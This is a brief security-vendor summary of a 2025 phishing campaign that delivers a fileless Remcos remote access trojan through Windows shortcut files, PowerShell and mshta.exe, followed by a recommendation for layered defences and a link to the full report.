In May 2025, a stealthy malware campaign was identified delivering a fileless variant of the Remcos Remote Access Trojan (RAT) via malicious Windows Shortcut (LNK) files and PowerShell-based execution chains. The campaign exemplifies how attackers are increasingly bypassing traditional security controls by leveraging native Windows tools like <code>mshta.exe</code> to execute payloads directly in memory — leaving minimal forensic traces.

Phishing emails, often themed around taxes, are used to lure victims into triggering the infection chain, ultimately granting attackers full remote access. This operation highlights a broader trend in cybercrime: the weaponisation of legitimate system components and fileless techniques to quietly establish persistent control, exfiltrate data, and evade detection. Remcos, once a commercial RAT, continues to evolve as a favoured tool in espionage, fraud, and credential theft — with this campaign marking a sharp escalation in its stealth and delivery.

These developments reinforce the need for a defence-in-depth strategy. Relying solely on a single security vendor — especially Microsoft Defender, which is deeply integrated into Windows and frequently targeted by attackers — leaves organisations exposed to blind spots. Combining complementary detection layers, including network, behavioural, and memory-based analysis, is essential to identify and disrupt modern threats that bypass conventional, signature-based defences.

Download Report:
https://www.cyberstash.com/wp-content/uploads/2025/05/Stealth-Tactics-Unveiled-Fileless-Remcos-RAT-Attack-Using-PowerShell-and-LNK-Files.pdf